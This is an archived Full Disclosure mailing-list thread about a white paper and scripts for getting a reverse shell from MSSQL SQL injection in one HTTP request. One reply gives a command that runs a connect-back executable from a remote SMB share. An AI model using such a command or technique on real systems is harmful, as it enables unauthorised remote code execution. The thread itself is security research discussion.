Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: One Click Ownage [White Paper and Scripts]
From: T Biehn <tbiehn () gmail com>
Date: Mon, 6 Jul 2009 11:07:46 -0400

Ferruh,
The script host can be restricted to prevent this 'attack' Uploading
files to a windows host has been beaten to death, it's frankly insane
that you ever got booked for some security conference.
But yeah, the last ditch effort is always netbios, sometimes you even
have to modify the local box's rules to allow NBoIP. Hard stuff.

-Travis

On Mon, Jul 6, 2009 at 12:22 AM, Fredrick Diggle<fdiggle () gmail com> wrote:
Or just

'start \\DiggleSec.com\fredrick\connectback.exe'

would have also been acceptable.

But Fredrick is sure that your 20 page write-up was fantastically entertaining.

On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh () mavituna com> wrote:
This is a different and more practical approach to get a reverse shell
or code execution in SQL Injections (particularly in MSSQL). The idea
is simple. Getting a reverse shell from an SQL Injection with one HTTP
request without using an extra channel such as TFTP, FTP to upload the
initial payload.

White paper explains the steps and the details of the attack. Scripts
got all the tools you need to create your HTTP request with your own
payload.


White Paper:
http://ferruh.mavituna.com/papers/oneclickownage.pdf

Scripts:
http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip

Presentation (IT Underground 2009):
http://www.slideshare.net/fmavituna/one-click-ownage-1660539



Regards,


--
http://ferruh.mavituna.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]